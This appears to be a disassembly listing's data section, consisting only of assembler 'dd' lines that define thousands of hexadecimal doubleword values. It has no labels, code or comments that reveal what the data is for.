dd 81F0A1B2h, 0EE8E3DDFh, 0FDABA596h, 0F3D73314h, 4BB333E7h
dd 9D90502Ch, 364EBB4Bh, 0FA121116h, 34B6F0A7h, 0FFE89CF1h
dd 7701E4B5h, 83E708BBh, 4917D59Dh, 0F5ACE173h, 0C1693896h
dd 88F9C1B0h, 4C065D9Fh, 0FF1A0AD0h, 0D7AED18Ah, 391CEEC6h
dd 6761732h, 0F4B3A3Fh, 0FE728FB2h, 2E9592FFh, 0C40AC344h
dd 0C4CE2F75h, 96EFE3B3h, 8824C2BCh, 6055B784h, 649E5CFFh
dd 0A94AA06Dh, 0CFA99788h, 61453144h, 0C628E9ABh, 1750668Fh
dd 6F95A4EAh, 142B8522h, 4D80EF79h, 0CBA6848Fh, 0E19F1254h
dd 2C11B271h, 5DC26537h, 0CB6E6463h, 0FB16B8BEh, 7F081FD7h
dd 0F1AC5BD9h, 3675E218h, 59D62D38h, 62E470BEh, 159F68B1h
dd 0D6178772h, 35BECF5Ch, 64325D6Ch, 45211912h, 0B30C7A96h
dd 0C7E52CA0h, 0B5C8519Fh, 7916088Bh, 9214D6DDh, 75E0615Bh
dd 588242F3h, 942F4192h, 6ACE8058h, 0ED6CAE08h, 4E6D17EBh
dd 59D2159Eh, 4D78352h, 0A8325D5h, 0A1728ACBh, 54ACEA02h
dd 5EBE7C63h, 79129373h, 0DBEC2D29h, 0AB3608D1h, 0B73FBBE3h
dd 0D1F3916Dh, 0EAA59EE0h, 44CA4EB9h, 7E6F107Eh, 0C9DF8B17h
dd 386FA1C8h, 0E48E71B1h, 4995765Eh, 7CA4F809h, 36EBC28Dh
dd 0CC8A1821h, 0E9F9D19Eh, 84E8792Fh, 2B8A99E3h, 0F6CC6B81h
dd 9E59FCE2h, 0BF6AB187h, 6397E172h, 0D4379E34h, 40E8F380h
dd 0CF8E1Ch, 0CA8EBA46h, 2F85058Dh, 96ADD501h, 27F5D3E4h
dd 0F2886CC4h, 94994E7Fh, 0EA4D980Fh, 0B066DF3Eh, 0AB0FBEB2h
dd 0EEB3CB6Fh, 0D9BED279h, 0CF387165h, 0B7B70C8Dh, 2B9B27E6h
dd 0CEA651FBh, 949D7DC3h, 9AFD2419h, 92F65779h, 4024E71Ah
dd 5C9D765Eh, 1FB66F76h, 85148669h, 0B68F850h, 0D6C28FA8h
dd 256670E2h, 5E0193DBh, 748D00FDh, 87724AEDh, 0F6D458B5h
dd 742B1138h, 0BA5F2E92h, 0E4520CE1h, 55B2EF9Bh, 0A3C77225h
dd 9256577Eh, 0CC0A4CE4h, 0DD9F0497h, 0D9AC6E7Ch, 0BA344EDDh
dd 0DA1113Dh, 0F8F393DFh, 89474762h, 0F99AF8EFh, 0B1EE577Bh
dd 46B3A5E3h, 0C4B69FDEh, 6C35C4C2h, 6E625C88h, 0A31DFB8Eh
dd 827E8D38h, 0D5EE9FD1h, 91F602A7h, 0B2D07184h, 0A884CE4Ah
dd 43E74E2Fh, 0DF6E432Fh, 0F3E68986h, 48BBF2C1h, 3612CD78h
dd 8C57DF82h, 677D8933h, 0D7F8FE0Bh, 3EB4C737h, 0C94FD47Ch
dd 5A098ACFh, 3DF7B55Dh, 0DC802E3Ah, 2F423C38h, 8527FC95h
dd 1C844A30h, 27DBD7D7h, 0A17BE2BAh, 74D740Eh, 0FF49AB68h
dd 3946ADCDh, 80468F67h, 2066937Ch, 0C9EE32D7h, 376DC65Eh
dd 0ED146B3Dh, 0AEC8A831h, 0FB066C0Fh, 3B9F8E09h, 55EF3400h
dd 53BC060Dh, 0A1737287h, 2C8CE6A7h, 0CE86C43h, 0DA1F69Ch
dd 47196A06h, 0D8C56837h, 57E00303h, 6A05B72Ch, 84A2EEACh
dd 4C52D495h, 76525920h, 63A29BB5h, 0A044AB26h, 31A33415h
dd 7B135223h, 0C0AAA4B0h, 0A287523h, 95EB40D2h, 2C41FADBh
dd 5545E74Ah, 0CB52715Dh, 50FC5A19h, 670DC10Ch, 0D5E04154h
dd 4BCC64DAh, 72B1828Ah, 7DC4B94Ah, 0C6738DA3h, 426F669Bh
dd 9BD52D33h, 0DBCF3F8Fh, 0FBF6B598h, 944F5472h, 1A9B274Bh
dd 31157837h, 9C8F4300h, 7D4D65E4h, 0B1934F9Dh, 0BDAA3044h
dd 13696E4Ch, 9A472289h, 83B0851Dh, 81FBE5A3h, 484BF2A2h
dd 6637C8CFh, 0ED04ED9h, 6D28DC3h, 0C2BC5669h, 0B92FD89Ah
dd 0DB3B509h, 5744E07Ch, 5BAFEFDBh, 0E5B12761h, 2AB21EABh
dd 18B1AF8Dh, 97AF6A42h, 9C572A24h, 0A0FC1405h, 167877ADh
dd 2A4C71h, 5A0372D5h, 1BAE985Ch, 0E236E28Ah, 4CA3EDB5h
dd 0B0876571h, 0EFAEA699h, 8E1B3AD4h, 25240CAAh, 7495795h
dd 0F13704BFh, 0C24762AFh, 0EA9C9F20h, 0E48A2719h, 2C36C78Bh
dd 0F8FF9A1Fh, 0BDFF8Eh, 0
dd 0E1872743h, 8FE224E2h, 9549544Eh, 77EBFF03h, 1A698880h
dd 0D2EB25E5h, 1307C2DAh, 0BB59AD19h, 0FCF62613h, 439D55CEh
dd 532F2808h, 0C1464A5Fh, 4523E425h, 87C59024h, 3DC6CCC9h
dd 8801BD0h, 9FB88D67h, 0C938D332h, 1022AF3Fh, 8E511EF7h
dd 523601B5h, 2122DFB0h, 2589D907h, 0D75BFA2Ch, 9DB4D7C6h
dd 0D65D135Ah, 0D7337C91h, 4F07E405h, 0C8AD054Eh, 9B58CE6Dh
dd 4E2D4CABh, 96D075h, 9D8A141h, 552CA9C3h, 0C9DF7D51h
dd 0D18714B3h, 0C7CB3710h, 7D612E6Dh, 0E4C75A33h, 31FF2606h
dd 0CC3C1AB9h, 0F67C52F1h, 0AACC73EDh, 0F22328EBh, 7C10BC8h
dd 9359FAB2h, 6FCD4C18h, 5EECC873h, 0B937E0ACh, 68B5E773h
dd 7DF0C324h, 1887E302h, 5A572F5Eh, 6B42A20Ah, 99F42C19h
dd 2CCAF479h, 0EC2EF87Ah, 45ABF024h, 2E0E3EDDh, 4BC7B786h
dd 955D94E0h, 0AECD353Eh, 877B1942h, 178D3280h, 0B8BA0EBFh
dd 0D59D41EAh, 30D2F726h, 0A12639EBh, 357A9642h, 0D1114BF5h
dd 0FB3EA2B9h, 0CF88A08Ah, 22E98144h, 0CE45B272h, 0BF71919h
dd 70EB0524h, 0AE4FB215h, 520113A0h, 381F2133h, 0E3A23D3Ch
dd 73F7991Ch, 1BC79199h, 7ABA6157h, 0FB12B73h, 7C977770h
dd 0E36C1BC8h, 5C63B55Bh, 627570B8h, 0AD68C2Bh, 7806150Dh
dd 7103E760h, 0FF943EB0h, 89F43FC6h, 59C02D34h, 447E543Bh
dd 0BE31FB5Dh, 761345F1h, 0B99D166h, 2F3F4C3h, 8ABB29F9h
dd 2AEA5A7h, 48D90915h, 0B66CD49Eh, 37B1C503h, 0E7120353h
dd 0D331095Bh, 0C766F741h, 70EB5661h, 2448B434h, 634C6408h
dd 617D727Fh, 0FAFC9135h, 0AF917A85h, 0EA906280h, 0CFDEE535h
dd 0B371AB10h, 632BC9Fh, 188F737Dh, 85EE9098h, 4EBD7F37h
dd 19027D6Ah, 23EC430Eh, 8352E437h, 8DC57DEFh, 3032EE1Ch
dd 0DF14C2DDh, 84F52A84h, 0D55F942h, 398CF650h, 31D25E4Eh
dd 4E3B0F6Dh, 79C27154h, 0C9749C08h, 54B23417h, 0E877AC22h
dd 0BACD63BFh, 3F41B94h, 0BC8A661Dh, 82CADA41h, 59AAEAEDh
dd 16B6D278h, 616CB8ACh, 2027302Dh, 5866192Eh, 0DB40DF02h
dd 0BB14F16Bh, 82C8849Ah, 7A4326F4h, 9C7C1E41h, 0E014165Ch
dd 0FF9E382Ah, 71D1C041h, 922A3233h, 68178553h, 0C0463EDh
dd 783C295Ch, 0EB1BFFF0h, 3D379066h, 2078B566h, 9043E2E5h
dd 723D0191h, 887BBB6Ch, 0D90081BDh, 4456B1D6h, 0D5A76AC0h
dd 0AE5DB553h, 335FCAF1h, 0B4478235h, 4C6DD5C2h, 5C0EFFC3h
dd 8A859FD2h, 0F5590AC6h, 0A307E349h, 890644E1h, 127F0A44h
dd 9C514C01h, 4991B51h, 3748D6D4h, 74E74772h, 0A5FB30C9h
dd 9C1727F5h, 0A214EC2Dh, 0A331AB5Ch, 62621B3Fh, 0E53CF829h
dd 76C1787Dh, 2F50E348h, 3DEA756Fh, 0CBF5BAA3h, 0BAE7B101h
dd 218A8BE6h, 0A0082E50h, 73B8173Eh, 746B8502h, 0C8C1224Fh
dd 9A19269Eh, 0CE833480h, 0FE19EA6Ch, 0F64522DEh, 695FF0D9h
dd 75883196h, 0F2970A8Bh, 5E85360Ah, 94E44579h, 26185191h
dd 4535B2F0h, 2875B03Eh, 0E8F47B90h, 5074B628h, 72C0918Ah
dd 84C0D662h, 5F704F1Eh, 6639AC5Fh, 5D7B7BCCh, 0DBDB8613h
dd 0A7F5049Bh, 20110324h, 0E35D3CE1h, 0F428DBAh, 0BC63E43Ah
dd 0ACDA124Dh, 2AD0A475h, 6AF80EF4h, 17543450h, 0E832851Ah
dd 36D67A19h, 0B85E5DE9h, 0B3B5CB2Dh, 47E9A0C3h, 94DB5729h
dd 5B64EEF3h, 0A2FD4E7Dh, 1A6E4875h, 3CACBCB7h, 0A61A7F41h
dd 36BCDEA1h, 9F166382h, 0B49387F5h, 29B2DFDDh, 2FB78392h
dd 88EF2C3Eh, 4360113Fh, 49234782h, 0FCC4C21Ch, 0CE6EDE7Eh
dd 7B08378Dh, 3048B07Dh, 902E7AA5h, 0C6D8CAAh, 63B6DEEAh
dd 4DFB5F33h, 6921A5BFh, 2D878DF4h, 40735F46h, 7D67091Ah
dd 0DADFF764h, 585FE8F2h, 16097C61h, 0E57FD343h, 0BE46B64Ah
dd 0BFBAF986h, 0CED14934h, 3655140Eh, 0F54B8D7Bh, 0D447EECDh
dd 0A4C27020h, 174CB04Eh, 559C3B6h, 8E3F6A00h, 8CBA31C6h
dd 93B04FCFh, 4663C2F9h, 0C81375EFh, 6B4B0FF2h, 8C3B46B7h
dd 0BE9D9D65h, 0CF1A3B6Ah, 0E7E4A9F8h, 17B33B3Fh, 0B5A890D2h
dd 81FBF88h, 3448FCE5h, 3B223766h, 625ACA2h, 42730550h
dd 9495EDB8h, 0C5176D1Fh, 0BF1A8882h, 5F14E7ECh, 0F1640D7Bh
dd 3FC738B6h, 3BBEDBABh, 38856776h, 0E3A8A097h, 897D258Ch
dd 70FB108Dh, 89F41876h, 237EF4DEh, 0E63AF2C4h, 9D70C649h
dd 5C64B50Dh, 25720BEDh, 0B7BCAF7Ah, 264E110Eh, 1BC09770h
dd 65B9CB51h, 0C4AA0945h, 0F9F43718h, 0E853866Bh, 5C6ECD1Ch
dd 2B182C63h, 7B30D87Ch, 0B846C00Bh, 0CA183907h, 3D37BC2Eh
dd 0B4C1F516h, 4E0307E1h, 0B05EEA20h, 3E45A5A7h, 86C30417h
dd 2D72C7DBh, 0E908F104h, 6391AB03h, 0F8998D0Dh, 1CE2B5C2h
dd 9E462D23h, 0F6D8BDD6h, 26C8F0E1h, 6136FD6Ah, 0A546409Fh
dd 7F3152E3h, 0D8F2D2B2h, 1E8ADC6Eh, 9453FB51h, 0F00832Ch
dd 0E00876B6h, 45714222h, 1AB66430h, 0A835EAFBh, 4003B64h
dd 0FB0DAB10h, 631E50A0h, 0C3A87DFCh, 8C39681h, 0EE22BC53h
dd 58414616h, 133C84CBh, 0A85DBD45h, 0F84F3AEDh, 5E05F7BBh
dd 0ACFF07B1h, 69CF3567h, 7947C1FCh, 4E8F1624h, 82C42A04h
dd 68CCBD20h, 0C9B0F41Dh, 0A3A5BDFCh, 1989F82Dh, 0B03BFD14h
dd 207C0BC9h, 0B54D1C9Fh, 6A9342EEh, 7E5C2A2h, 60F4E209h
dd 0B2A9C367h, 49346F2Ch, 76ACF6C5h, 0D0A2AC1Fh, 0F9612275h
dd 7FF27F96h, 0F854852h, 0D9D236CCh, 8FC34CEAh, 90C75951h
dd 8B8034C7h, 0F4B2C816h, 0E2869AD5h, 0D5811851h, 2CD3CEF4h
dd 117C45C9h, 53A4730Eh, 0B3A07032h, 0E3C6480Fh, 9D959E80h
dd 76119371h, 0A721FF38h, 0F1705C52h, 5879D1EBh, 17137700h
dd 37B221BFh, 0D088117Fh, 0F7BE6547h, 0FA52FF16h, 1CA97049h
dd 1FEE9DF6h, 5D97165Ah, 0D4477782h, 92A403DDh, 0CBA66533h
dd 0B96A4846h, 0F43A310Dh, 80D1252Ah, 0C611F62Ch, 0AADCF4F5h
dd 3439F4CCh, 124EAED1h, 0E02213F5h, 0C7446362h, 82102B36h
dd 0BA345D82h, 0F5F50C9Eh, 4A307722h, 4F9D004Dh, 0D9CFB0D1h
dd 4960DD47h, 0DECD03ABh, 8A925D48h, 0FA6AFB2Eh, 622E26C9h
dd 9F257689h, 0C0C14725h, 0C296251Ch, 0F3111026h, 19BD1DB2h
dd 35C1C691h, 1B11763Fh, 4C836266h, 0B520EC9h, 0B8A01E6h
dd 844862F5h, 0C2B8749Dh, 0B7BC4FCh, 2DA8D622h, 434F405Ch
dd 0F31224F4h, 198E581Dh, 6DA07C26h, 0F03D9829h, 5F597204h
dd 0C97C3ED5h, 0C77FD516h, 0F92F22E3h, 4708A091h, 0B84DBE73h
dd 83698933h, 0CC371B27h, 0A08F5CEh, 6815B772h, 74F789A1h
dd 0E98A7831h, 0DAA45A86h, 25B9A844h, 0A0CEBFA2h, 0A0A151FCh
dd 189D8A42h, 2C23DD2Eh, 0B3DB5C5Ah, 36554C9Ch, 6B026AA1h
dd 9522B4AEh, 8D167AC3h, 629B7E86h, 4680DAE6h, 89BC771h
dd 0FDDCE2FCh, 686AC71Ch, 163F8DC2h, 8392F974h, 0F3A9D391h
dd 0CD743C39h, 0EFC9EF1Eh, 52FB2A6Ah, 0BD10043Fh, 6E134198h
dd 5B9C2EF6h, 0ADB0BC15h, 0AA66B03Ch, 0EBA4AC93h, 0D1F9BC5h
dd 0D19F29D2h, 9CA6443Bh, 0FF823A0Bh, 8BBEB7D0h, 0A36411D2h
dd 0ADA64474h, 0C5793843h, 9CC3B62Eh, 6372766Dh, 52144E80h
dd 89BF9C5Dh, 1EF4A036h, 820E2555h, 8A4DF51h, 0E715B11Bh
dd 0A3244FC8h, 17C75266h, 0CA90D9D7h, 0A4F57E11h, 12608483h
dd 1AA920B2h, 9554066h, 0CAF67A45h, 16826A54h, 0B98A6991h
dd 0DE255841h, 0B25B1BAFh, 0B24D374Ah, 0A464F438h, 3D110Ch
dd 0D68BC16h, 0F2FAB3BBh
dd 8C64237h, 1643FC8Ah, 737AF44Dh, 66D1B8BDh, 0C7060EE2h
dd 7B455AE9h, 5CE6B75h, 0AD4E3D0Bh, 430393DCh, 27DE67CCh
dd 569B90FDh, 93BB8194h, 0EC5E132h, 0D64FEE75h, 0ABA71689h
dd 5DBDC877h, 6214B0DBh, 0B4916863h, 745EC858h, 8888FEEEh
dd 0B3837F67h, 199BE48Eh, 0D4E93CA6h, 10F50A1Bh, 5AA9820Eh
dd 0FBD1A545h, 1378561Bh, 390DACE7h, 0E3608A76h, 0A84944D0h
dd 4C47D23Bh, 0D8CAA545h, 91791DAAh, 0A0B1CAF9h, 69C25A5h
dd 14A5A5ECh, 8E32D150h, 46815606h, 6F4FEFAFh, 0DE48A2Ah
dd 0A093944Ch, 7CA91C8Dh, 35ECB8E3h, 0F9DD7050h, 0E4442CBCh
dd 0C76D00D9h, 0D3F5C3D8h, 16532A52h, 4B63BC08h, 0D4EEBD6Eh
dd 8593C55Fh, 4EB3241Ah, 48D3E7D6h, 1E090D47h, 6D12A7ACh
dd 586BAAC0h, 1CF5EB13h, 5B828FD2h, 9C7BABABh, 0F6C40D41h
dd 0B9AB56FBh, 0A3D64875h, 2DFF1910h, 92EB72E9h, 8F2FD67Ch
dd 0D75001h, 90C28946h, 44BA8DD0h, 7375AC58h, 76288CA1h
dd 4A458F89h, 0DAB2E36Ah, 704B89CAh, 2B63C9BCh, 0F1EB6E70h
dd 1537771h, 0C14F2AF0h, 98BFB686h, 30D23A14h, 32E7AFD7h
dd 42528CA1h, 0C1E23FDCh, 0BF428742h, 3FEE6338h, 876D067Fh
dd 0F846A6C7h, 98E72E13h, 0E0532492h, 1BBF4691h, 0F3FDE593h
dd 0E41373DBh, 0C8AD7608h, 0DFB95925h, 0EE66B6DCh, 78052728h
dd 0E85535FAh, 0BC404302h, 72C00491h, 7F763573h, 683F6B99h
dd 0E84827A5h, 5DBBF608h, 1D1DFBA8h, 7A83657Bh, 1EC64E2Dh
dd 73D279DBh, 8AC27BBFh, 7ECBDDEEh, 89E12D47h, 2B6CAB3Bh
dd 0FB2CAA4Ch, 997A876Eh, 0DD83CAB6h, 64BFD98Ch, 7C3E0B60h
dd 0E262853Dh, 3590C0EEh, 0B2050D32h, 11BDF801h, 17707C70h
dd 3AF41CB0h, 75EE4A5Eh, 6B7E0BF6h, 0A0461161h, 0A8C0F06h
dd 0B96F7555h, 976B3182h, 7388930Bh, 0B25B560Bh, 993DD015h
dd 57E0EE37h, 0E9BFCD55h, 0B0D5186Fh, 4BE7CBF7h, 312BFF11h
dd 7957BDF4h, 0B093CCF8h, 0CE778C29h, 0FF50400Dh, 52B81C1Dh
dd 0F18E2D21h, 0ED2E6F04h, 9DEDF092h, 539EAECCh, 4CF1B34h
dd 0CCBD1D62h, 0C1460F69h, 909395F9h, 0E18B1AC3h, 26DD4C62h
dd 6562FC3Ah, 446365B4h, 0F8FA3592h, 0BB26E084h, 98ED23CBh
dd 1364E2E7h, 0DC67D66Bh, 0CAE4957Bh, 1E3B4A71h, 1D157C18h
dd 0CC7D825Dh, 1A7ACC26h, 0B41A6377h, 0F20DB245h, 0F4E42E7Bh
dd 77475FADh, 363E01BBh, 91B6A820h, 0D9BCC14Dh, 5D4EE333h
dd 0AD1270CAh, 0F6CBB878h, 0B20DD69h, 0E6D0D307h, 9137215Eh
dd 0CB654DFh, 49470975h, 5B683A9h, 75317DCEh, 0CF57A08Eh
dd 896668EDh, 68FCBB10h, 22CB5F8Dh, 0E7FF75AFh, 5E48DE34h
dd 0E3E13B99h, 0E1DDF67h, 71459E08h, 50C8595Bh, 3814BEB1h
dd 0B7404C13h, 0F8CABAA0h, 9BE64707h, 70D78A83h, 0A55EE5A7h
dd 3A3B3646h, 23BF280Eh, 0F3228EA0h, 0D99019E3h, 0B52E309Fh
dd 0C0EC3FD1h, 0B444260Fh, 9017B4DCh, 8EA89385h, 729E3FC8h
dd 539F03Eh, 0A8DA400Bh, 0C47B9753h, 0EB50902Fh, 3A40505Eh
dd 4A857B42h, 1495F7ACh, 10AAB4D7h, 6E56DDF0h, 3C135AD4h
dd 7DA23238h, 9092BAA7h, 519B0BE0h, 125762BAh, 0DDF722CBh
dd 249AC2B7h, 4A381D7Fh, 0E1365518h, 4F3A50F9h, 8470AFF3h
dd 64F5DAE0h, 67C9DA51h, 4AF44A07h, 8B34E9C3h, 17B8A50Bh
dd 8F442D24h, 145662B2h, 2C82A439h, 823EB739h, 0EE4CCA24h
dd 8A78526Ah, 2B55C2C9h, 0D949FF52h, 0C1F33356h, 890B52CDh
dd 0E5B6059h, 9EC0A62Bh, 10F88D14h, 8616038h, 2F627913h
dd 89B3C67Bh, 3E197C26h, 34D644C3h, 467DE4A3h, 0BDC8F101h
dd 3CB91C0Ch, 0B270F658h, 3AB1B56Ah, 0EB65B587h, 9903BF83h
dd 2DF9A7AAh, 89942218h, 0C221DD67h, 13319433h, 1EBBEB9Ch
dd 0E27F3A52h, 0F6119752h, 0E5E18AB1h, 330F0C1h, 1BA039BAh
dd 0C006B1F9h, 89FFAFDAh, 3141D2D1h, 0E295D266h, 0F5502D93h
dd 6056CCAEh, 90F3BA08h, 1F81C8E1h, 686184ACh, 0B26B4385h
dd 347E4411h, 0F321AB29h, 1E077B74h, 6B024B98h, 587D69C0h
dd 0A21E0CDh, 500D780Fh, 0EC9D096Eh, 0A750DEDBh, 3F12E507h
dd 4F13AA8Bh, 4353865Bh, 195EBFAFh, 0F3595377h, 18B0BDDCh
dd 0D732CF00h, 8C16DF9Fh, 0AFF2CA11h, 0DAF88B27h, 0F9A69B92h
dd 0CBFDE19Ch, 5BFD0AD3h, 3344D138h, 2B94F829h, 6950FE5Ah
dd 0F9459011h, 7458225Ch, 0C0044A88h, 61E9474Fh, 7F122E5h
dd 6E046C55h, 0BAE1E382h, 182910C0h, 750487DDh, 0F7CD34DFh
dd 1099E13Dh, 0E03F91ECh, 0ED91A98Dh, 0D34D65CAh, 489F8401h
dd 9AC6FBB1h, 42E666A1h, 0E77010C3h, 738504Dh, 0E2865A9Bh
dd 9324298Eh, 0A5063E9Bh, 863664B6h, 82207BAh, 0D5B1A99Ah
dd 0C5F24AB3h, 0FE1C1136h, 0C48FD4D2h, 0EEE7A796h, 1C2EE379h
dd 30E36D4Dh, 0F1C59A96h, 0E59CC239h, 715FDB5Bh, 0B8FFB915h
dd 2D65BAEDh, 1404796h, 3600BF27h, 426084F7h, 0E5EBCB2Bh
dd 1CAACCFFh, 0E2C1EA13h, 1D71A615h, 0EDD498F7h, 0EBD27E00h
dd 3C5FBD44h, 0DC9F1D1Ah, 2AE668Fh, 0EA0186B2h, 182CBD3Ah
dd 84F70036h, 148381B5h, 5DE3674Ah, 5D0CC4D1h, 48861D84h
dd 0F9538BE7h, 200DDDC8h, 28B0F5B7h, 8467818Ch, 486C9A31h
dd 7292EB11h, 83688177h, 2350CD8Dh, 2512576Bh, 0B4985395h
dd 0F789001Eh, 0E9C609FBh, 5940CF6Fh, 0E47EE371h, 0BB0880CFh
dd 0EF31CE48h, 0E0DAF0ABh, 6A07935Dh, 0C36120B6h, 1636386Bh
dd 7AFE88DFh, 3E7F3C4Bh, 0C2FB1CBDh, 7AB705E6h, 0C6B81FD3h
dd 212924D9h, 0AACB0151h, 0F80A413Ch, 7D6072D2h, 8A225097h
dd 0D02634A6h, 5EDC09B5h, 0C2C83703h, 275725A2h, 0CFE7682Ah
dd 0E5A4EEC0h, 2CDB1C8Fh, 0F3AA73E2h, 0BCB6B22Eh, 0E1BBA75Fh
dd 0CBD5A816h, 9C447951h, 0AA595DA2h, 0FA12FE2Ch, 7DD9C9BFh
dd 6B745BA5h, 4C037BB6h, 0A02F90F5h, 73F56034h, 10874B29h
dd 0F912D86Ch, 114461D5h, 584451B8h, 4D479565h, 393432ADh
dd 0DFD24634h, 0DB22469Fh, 33627E27h, 0FDBA43AEh, 0E0A6EA43h
dd 0C3A17966h, 1273E512h, 0A07A1F3Ah, 80C9DC83h, 0E667969Ch
dd 3391A5B0h, 59689D1Eh, 0D6E43B10h, 6B717BBAh, 7F2447DAh
dd 9BCD8057h, 8E5FF02h, 0FEB68629h, 42B11F8Eh, 521A063Bh
dd 0C88671DEh, 0CA085C1Ch, 0EEC92CEEh, 7A636F97h, 590810EEh
dd 4D7A0D66h, 18A6F007h, 77DE9662h, 3AE53FD8h, 7667F1F7h
dd 0FDEE6319h, 0DD94D985h, 0DF8C95FDh, 0E49A33C1h, 0F964A907h
dd 0D366594h, 0F202DB2Ah, 2A8A9BDDh, 9CED9096h, 0DAC36B51h
dd 0D828791Ah, 947B3FADh, 9CB09FC1h, 0DC16EBB4h, 1A162204h
dd 0EB35E336h, 1143E7C9h, 0EEEC3BE5h, 6F7E1602h, 4ECF1991h
dd 724A79EDh, 0F0E84182h, 47EB96E9h, 8A09D583h, 0F728C08Bh
dd 6F393001h, 0DFC6D0DCh, 76C8144h, 33D71CE7h, 0F884088Ah
dd 0A8338C05h, 91DBACh, 0CF32F5Fh, 0D45B514Ch, 0F261416Ch
dd 4A5EA7Ch, 69FEE88Dh, 13306A75h, 1A01D39Bh, 0AEAF2651h
dd 7E96EE48h, 5A21A211h, 0F6921AFh, 3CE1AAF6h, 6001CE96h
dd 0F1C19D32h, 0CF113EFCh, 90F3A78Fh, 2676B711h, 80E5CFE7h
dd 2EB3C775h, 0AD31ABEAh, 6CCCB19h, 0C311F9Ah, 9CF0363Ch
dd 0DBC20BC5h, 95D10126h, 5329D18Eh, 0C7FCF34Bh, 1F435991h
dd 669AD157h, 4CAF3697h, 4773F988h, 81699E73h, 0AF871171h
dd 654B4EC8h, 279FF3D4h, 0CC0626E6h, 0B279CCCEh, 8733E5ABh
dd 0D55BE8B4h, 0B9D14C4Fh
dd 88C816D5h, 586C2AE5h, 563712C7h, 53682063h, 0D2070F6h
dd 0CC8D9917h, 41B59598h, 0B4F1781h, 0EEE0C69h, 0F2956D58h
dd 0FBDDCFF2h, 0FD8CAC04h, 8F3D951h, 0C754A5EFh, 0CB495E44h
dd 1FA43679h, 8FEFEFBFh, 9829DB2Ah, 0DC8C0E2Fh, 0CBB69094h
dd 4D5231Dh, 15D4FFB6h, 0C9CCE230h, 52ACC60Ah, 1D3314A2h
dd 0AEEC514Eh, 652D8C5Dh, 24475122h, 0CC6DFB48h, 5B250C9h
dd 6955FDEh, 236CB524h, 0E4082B1Fh, 0EC01BA3Fh, 6E96419Dh
dd 6F2F9293h, 76B867A7h, 50005C5Eh, 532322D4h, 1FAE0665h
dd 972CDB06h, 0B34DFAEh, 0FFECC77Dh, 97D3B7D8h, 1530B355h
dd 0DA0B0A8h, 0CC0C53ADh, 48B90AD8h, 4F62D9EBh, 0E1F47FBEh
dd 0BF521F0h, 41D657FAh, 0E0A09FF3h, 8F89C417h, 0D4289DC0h
dd 0AE7E9F10h, 737CAC97h, 4897325Bh, 0EC201ECEh, 67D58E1Bh
dd 4FC95D52h, 1F39B04Ah, 0F351ABFAh, 3EF87FA1h, 0A2C22ADEh
dd 0D08A864Ah, 0A376F8F1h, 0BE507E94h, 699D2708h, 8A0D3062h
dd 937EAC40h, 380372Ch, 8EE83518h, 0C83B240Fh, 9E575DDEh
dd 0AF827DCDh, 24C12B4Eh, 0C48DA1FCh, 0ED4DCD2Fh, 1B10C0ADh
dd 0FDBDF2EBh, 1575BC1Eh, 0D6098CE1h, 9889A283h, 6E228F75h
dd 9F3BC080h, 7307CD18h, 2466BF37h, 0C8F8DDABh, 161C4B73h
dd 8B04F655h, 0E96F0DC1h, 0B76FC885h, 0E83E7D55h, 2BA4DE50h
dd 0CC764577h, 0FC13DD4Bh, 0B8A6DD44h, 339DFBB0h, 897D39FFh
dd 8D2E424Ch, 5C4D0F66h, 7366759Dh, 0BCDCFE39h, 0CB8ED3EAh
dd 0F890CB26h, 70C1EC41h, 5160B1ACh, 3E017DB3h, 7B0FE949h
dd 852310Eh, 0FADF5402h, 477C9468h, 0F719B15Eh, 1C8A26E2h
dd 0DADD2C3Bh, 3E00B658h, 6F6ED817h, 2DBF167h, 0E878A0B1h
dd 2DAAF660h, 0F3D932CAh, 8093F656h, 367F0EC6h, 0F56EAB98h
dd 0C7BBFB0Ch, 8D950006h, 6F3932D0h, 0BF49C95Dh, 483F29ACh
dd 0F28AF027h, 6B452BFBh, 6075D18h, 15D080CDh, 5F8C6740h
dd 95867415h, 0B02FFEF5h, 16EBC630h, 3C5CBC8Fh, 0F6EE5083h
dd 707BAB69h, 94375EBDh, 0DF10D281h, 69C3689Ch, 8631577Ch
dd 0DB02C351h, 1B091D95h, 79FF7638h, 0C2ECE7C1h, 1996FF1h
dd 0D27ED843h, 0C8430850h, 817F4A76h, 0BD6B1207h, 8F34E14Ah
dd 770CD9E9h, 0DCAE72E2h, 0B9DB9D8Fh, 4344A8D4h, 5EEBEAD8h
dd 0E8E8CB51h, 93AD7923h, 0BFA2338Eh, 0E8F20AC0h, 6EB6F418h
dd 23FC6640h, 1B9CD872h, 0C0BA5D9Dh, 0AEEF4E8Bh, 154FF40Ch
dd 60224B41h, 0AE73F0E7h, 3D4CC2BEh, 37BB551Eh, 0B138A327h
dd 0FCDA6D1Fh, 5F0332FCh, 47FAAEC2h, 0D09CC284h, 1C97089Ch
dd 0CBCB1A62h, 32CA2069h, 0B3E06C11h, 4E9B2E3Ch, 724C60D6h
dd 0A1C71125h, 0E541B8E7h, 48FA96E7h, 29C6F39Ch, 10C44695h
dd 0AE1427F5h, 24A9DB73h, 0DB2B1E70h, 8C780CFCh, 27B7A3C2h
dd 0DB0E8784h, 846DC068h, 3147DDF6h, 0CB493E54h, 1F318DFAh
dd 0C2B02683h, 0B0285296h, 24153D83h, 3C55DFFDh, 7E6C0D3Ch
dd 864B0CB5h, 0B86BB55Bh, 636197Ah, 0CF89EA6Bh, 439B040Ah
dd 13112D5Fh, 0EEDA93h, 0CD3EA31Bh, 87F36DB8h, 4D640F70h
dd 9F72813Fh, 8CEAC324h, 97CBEEDFh, 9FB79FEAh, 6A53450Dh
dd 0CA22A7ABh, 3E0EE573h, 0A3B4ED7Bh, 0ACE56BBDh, 1CB70CC2h
dd 6AB21108h, 0BFE5A6A4h, 516ED910h, 0C0C8B795h, 3AC67125h
dd 554D8807h, 0CCC221E0h, 493DD7D2h, 0F2C1B089h, 6FE233B6h
dd 0BA206B4Bh, 5282C033h, 0A77C5103h, 0B6A1A59Ah, 0F3F5B123h
dd 2411988Eh, 0C868E59Dh, 0E3B6C8EBh, 5F7B9F1Ah, 0FB4F723Ch
dd 0E29AFDB4h, 5501E928h, 6F579D0h, 7BE5F37h, 43DC9F60h
dd 30D57395h, 4E5151Fh, 711019BFh, 713559EFh, 871CBDA7h
dd 726D6716h, 1CD86DE9h, 910BC579h, 0C24EE5EFh, 5312F595h
dd 0A15A11C8h, 0BE12AF5Eh, 0AF6C5CF3h, 0BF08934Ah, 558BC8CAh
dd 4746CF75h, 0CC900540h, 0BF165CBFh, 0A4085224h, 87DEFE97h
